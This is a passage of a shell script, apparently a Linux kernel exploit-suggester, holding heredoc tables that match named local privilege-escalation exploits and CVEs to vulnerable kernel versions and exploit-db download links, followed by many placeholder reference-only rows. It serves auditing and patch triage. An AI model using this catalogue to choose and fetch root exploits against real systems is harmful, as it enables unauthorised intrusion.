   1337 pp_key	2016-0728	3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.1,3.8.2,3.8.3,3.8.4,3.8.5,3.8.6,3.8.7,3.8.8,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1		http://www.exploit-db.com/exploits/39277
   1338 prctl		2.6.13,2.6.14,2.6.15,2.6.16,2.6.17		http://www.exploit-db.com/exploits/2004
   1339 prctl2		2.6.13,2.6.14,2.6.15,2.6.16,2.6.17		http://www.exploit-db.com/exploits/2005
   1340 prctl3		2.6.13,2.6.14,2.6.15,2.6.16,2.6.17		http://www.exploit-db.com/exploits/2006
   1341 prctl4		2.6.13,2.6.14,2.6.15,2.6.16,2.6.17		http://www.exploit-db.com/exploits/2011
   1342 ptrace		2.4.18,2.4.19,2.4.20,2.4.21,2.4.22		
   1343 ptrace24		2.4.9		
   1344 CVE-2007-4573	ptrace_kmod	2.4.18,2.4.19,2.4.20,2.4.21,2.4.22		1	
   1345 ptrace_kmod2	2010-3301	2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34	ia32syscall,robert_you_suck	http://www.exploit-db.com/exploits/15023
   1346 pwned		2.6.11		
   1347 py2		2.6.9,2.6.17,2.6.15,2.6.13		
   1348 raptor_prctl	2006-2451	2.6.13,2.6.14,2.6.15,2.6.16,2.6.17		http://www.exploit-db.com/exploits/2031
   1349 rawmodePTY	2014-0196	2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36,2.6.37,2.6.38,2.6.39,3.14.0,3.15.0		http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
   1350 rds	2010-3904	2.6.30,2.6.31,2.6.32,2.6.33,2.6.34,2.6.35,2.6.36		http://www.exploit-db.com/exploits/15285
   1351 reiserfs	2010-1146	2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33,2.6.34		http://www.exploit-db.com/exploits/12130
   1352 remap		2.4		
   1353 rip		2.2		
   1354 CVE-2008-4113	sctp	2.6.26		1	
   1355 semtex	2013-2094	2.6.37,2.6.38,2.6.39,3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6,3.1.0		http://www.exploit-db.com/exploits/25444
   1356 smpracer		2.4.29		
   1357 sock_sendpage	2009-2692	2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30	wunderbar_emporium	http://www.exploit-db.com/exploits/9435
   1358 EOF_DATA_6
   1359 )"
   1360 KERNEL_CVE_DATA_7="$(cat <<'EOF_DATA_7'
   1361 sock_sendpage2	2009-2692	2.4.4,2.4.5,2.4.6,2.4.7,2.4.8,2.4.9,2.4.10,2.4.11,2.4.12,2.4.13,2.4.14,2.4.15,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21,2.4.22,2.4.23,2.4.24,2.4.25,2.4.26,2.4.27,2.4.28,2.4.29,2.4.30,2.4.31,2.4.32,2.4.33,2.4.34,2.4.35,2.4.36,2.4.37,2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30	proto_ops	http://www.exploit-db.com/exploits/9436
   1362 stackgrow2		2.4.29,2.6.10		
   1363 timeoutpwn	2014-0038	3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.9,3.9.0,3.10.0,3.11.0,3.12.0,3.13.0,3.4.0,3.5.0,3.6.0,3.7.0,3.8.0,3.8.5,3.8.6,3.8.9,3.9.0,3.9.6,3.10.0,3.10.6,3.11.0,3.12.0,3.13.0,3.13.1		http://www.exploit-db.com/exploits/31346
   1364 CVE-2009-1185	udev	2.6.25,2.6.26,2.6.27,2.6.28,2.6.29	udev <1.4.1	1	http://www.exploit-db.com/exploits/8478
   1365 udp_sendmsg_32bit	2009-2698	2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19		http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
   1366 uselib24		2.6.10,2.4.17,2.4.22,2.4.25,2.4.27,2.4.29		
   1367 CVE-2009-1046	vconsole	2.6		1	
   1368 video4linux	2010-3081	2.6.0,2.6.1,2.6.2,2.6.3,2.6.4,2.6.5,2.6.6,2.6.7,2.6.8,2.6.9,2.6.10,2.6.11,2.6.12,2.6.13,2.6.14,2.6.15,2.6.16,2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.25,2.6.26,2.6.27,2.6.28,2.6.29,2.6.30,2.6.31,2.6.32,2.6.33		http://www.exploit-db.com/exploits/15024
   1369 vmsplice1	2008-0600	2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.24.1	jessica biel	http://www.exploit-db.com/exploits/5092
   1370 vmsplice2	2008-0600	2.6.23,2.6.24	diane_lane	http://www.exploit-db.com/exploits/5093
   1371 w00t		2.4.10,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21		
   1372 CVE-2004-0186	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1373 CVE-2007-4573	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1374 CVE-2008-0009	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1375 CVE-2008-0010	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1376 CVE-2009-0065	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1377 CVE-2009-1046	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1378 CVE-2009-1185	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1379 CVE-2009-1897	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1380 CVE-2009-2910	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1381 CVE-2009-3001	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1382 CVE-2010-0832	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1383 CVE-2010-2240	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1384 CVE-2010-2963	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1385 CVE-2010-4170	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1386 EOF_DATA_7
   1387 )"
   1388 KERNEL_CVE_DATA_8="$(cat <<'EOF_DATA_8'
   1389 CVE-2010-4258	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1390 CVE-2011-1485	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1391 CVE-2011-1493	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1392 CVE-2011-2921	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1393 CVE-2012-0809	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1394 CVE-2013-1763	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1395 CVE-2014-0476	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1396 CVE-2014-3153	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1397 CVE-2014-4322	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1398 CVE-2014-5119	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1399 CVE-2014-9322	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1400 CVE-2015-0568	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1401 CVE-2015-0570	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1402 CVE-2015-1318	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1403 CVE-2015-1805	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1404 CVE-2015-1815	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1405 CVE-2015-1862	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1406 CVE-2015-3202	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1407 CVE-2015-3246	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1408 CVE-2015-3315	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1409 CVE-2015-3636	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1410 CVE-2015-5287	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1411 CVE-2015-6565	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1412 CVE-2015-8612	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1413 CVE-2016-0819	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1414 EOF_DATA_8
   1415 )"
   1416 KERNEL_CVE_DATA_9="$(cat <<'EOF_DATA_9'
   1417 CVE-2016-0820	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1418 CVE-2016-10277	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1419 CVE-2016-1240	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1420 CVE-2016-1247	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1421 CVE-2016-1531	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1422 CVE-2016-1583	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1423 CVE-2016-2059	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1424 CVE-2016-2411	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1425 CVE-2016-2434	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1426 CVE-2016-2435	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1427 CVE-2016-2475	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1428 CVE-2016-2503	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1429 CVE-2016-3857	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1430 CVE-2016-3873	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1431 CVE-2016-4989	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1432 CVE-2016-5340	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1433 CVE-2016-5425	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1434 CVE-2016-6187	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1435 CVE-2016-6662	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1436 CVE-2016-6663	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1437 CVE-2016-6664	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1438 CVE-2016-6787	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1439 CVE-2016-7117	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1440 CVE-2016-8453	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1441 CVE-2016-8633	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1442 EOF_DATA_9
   1443 )"
   1444 KERNEL_CVE_DATA_10="$(cat <<'EOF_DATA_10'
   1445 CVE-2016-9566	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1446 CVE-2017-0358	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1447 CVE-2017-0403	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1448 CVE-2017-0437	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1449 CVE-2017-0569	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1450 CVE-2017-1000251	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1451 CVE-2017-1000363	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1452 CVE-2017-1000366	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1453 CVE-2017-1000367	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1454 CVE-2017-1000370	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1455 CVE-2017-1000371	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1456 CVE-2017-1000379	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1457 CVE-2017-1000380	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1458 CVE-2017-1000405	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1459 CVE-2017-10661	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1460 CVE-2017-11176	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1461 CVE-2017-16695	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1462 CVE-2017-18344	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1463 CVE-2017-2636	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1464 CVE-2017-5123	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1465 CVE-2017-5618	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1466 CVE-2017-5899	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1467 CVE-2017-7184	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1468 CVE-2017-7616	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1469 CVE-2018-1000001	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1470 EOF_DATA_10
   1471 )"
   1472 KERNEL_CVE_DATA_11="$(cat <<'EOF_DATA_11'
   1473 CVE-2018-10900	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1474 CVE-2018-14665	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1475 CVE-2018-17182	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1476 CVE-2018-18281	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1477 CVE-2018-3639	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1478 CVE-2018-6554	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1479 CVE-2018-6555	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1480 CVE-2018-8781	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1481 CVE-2018-9568	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1482 CVE-2019-10149	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1483 CVE-2019-10567	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1484 CVE-2019-11190	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1485 CVE-2019-12181	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1486 CVE-2019-14040	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1487 CVE-2019-14041	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1488 CVE-2019-16508	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1489 CVE-2019-18634	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1490 CVE-2019-18675	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1491 CVE-2019-18683	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1492 CVE-2019-18862	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1493 CVE-2019-19377	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1494 CVE-2019-2000	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1495 CVE-2019-2025	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1496 CVE-2019-2181	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1497 CVE-2019-2214	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1498 EOF_DATA_11
   1499 )"
   1500 KERNEL_CVE_DATA_12="$(cat <<'EOF_DATA_12'
   1501 CVE-2019-2215	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1502 CVE-2019-7304	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1503 CVE-2019-7308	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1504 CVE-2019-9213	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1505 CVE-2019-9500	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1506 CVE-2019-9503	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1507 CVE-2020-0041	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1508 CVE-2020-0423	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1509 CVE-2020-11179	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1510 CVE-2020-12351	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1511 CVE-2020-12352	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1512 CVE-2020-14356	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1513 CVE-2020-14381	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1514 CVE-2020-14386	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1515 CVE-2020-16119	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1516 CVE-2020-24490	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1517 CVE-2020-25220	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1518 CVE-2020-27194	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1519 CVE-2020-27786	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1520 CVE-2020-28343	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1521 CVE-2020-28588	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1522 CVE-2020-3680	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1523 CVE-2020-8835	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1524 CVE-2020-9470	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1525 CVE-2021-0399	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1526 EOF_DATA_12
   1527 )"
   1528 KERNEL_CVE_DATA_13="$(cat <<'EOF_DATA_13'
   1529 CVE-2021-0920	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1530 CVE-2021-1048	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1531 CVE-2021-1905	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1532 CVE-2021-1940	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1533 CVE-2021-1961	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1534 CVE-2021-1968	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1535 CVE-2021-1969	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1536 CVE-2021-20226	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1537 CVE-2021-23134	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1538 CVE-2021-25369	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1539 CVE-2021-25370	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1540 CVE-2021-26341	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1541 CVE-2021-26708	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1542 CVE-2021-27363	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1543 CVE-2021-27364	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1544 CVE-2021-28663	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1545 CVE-2021-28664	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1546 CVE-2021-29657	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1547 CVE-2021-3156	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1548 CVE-2021-32606	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1549 CVE-2021-33909	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1550 CVE-2021-34866	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1551 CVE-2021-3492	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1552 CVE-2021-3573	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1553 CVE-2021-3609	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1554 EOF_DATA_13
   1555 )"
   1556 KERNEL_CVE_DATA_14="$(cat <<'EOF_DATA_14'
   1557 CVE-2021-3715	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1558 CVE-2021-39793	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1559 CVE-2021-39815	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1560 CVE-2021-4034	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1561 CVE-2021-41073	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1562 CVE-2021-42008	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1563 CVE-2021-4204	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1564 CVE-2021-42327	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1565 CVE-2021-43267	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1566 CVE-2021-4440	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1567 CVE-2021-44733	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1568 CVE-2021-45608	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1569 CVE-2022-0185	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1570 CVE-2022-0435	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1571 CVE-2022-1015	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1572 CVE-2022-1016	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1573 CVE-2022-1786	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1574 CVE-2022-1972	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1575 CVE-2022-20122	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
   1576 CVE-2022-20186	catalog_reference_only	9999.9999.9999		0	Reference-only CVE token from example repos; no matching rule defined in source suggesters
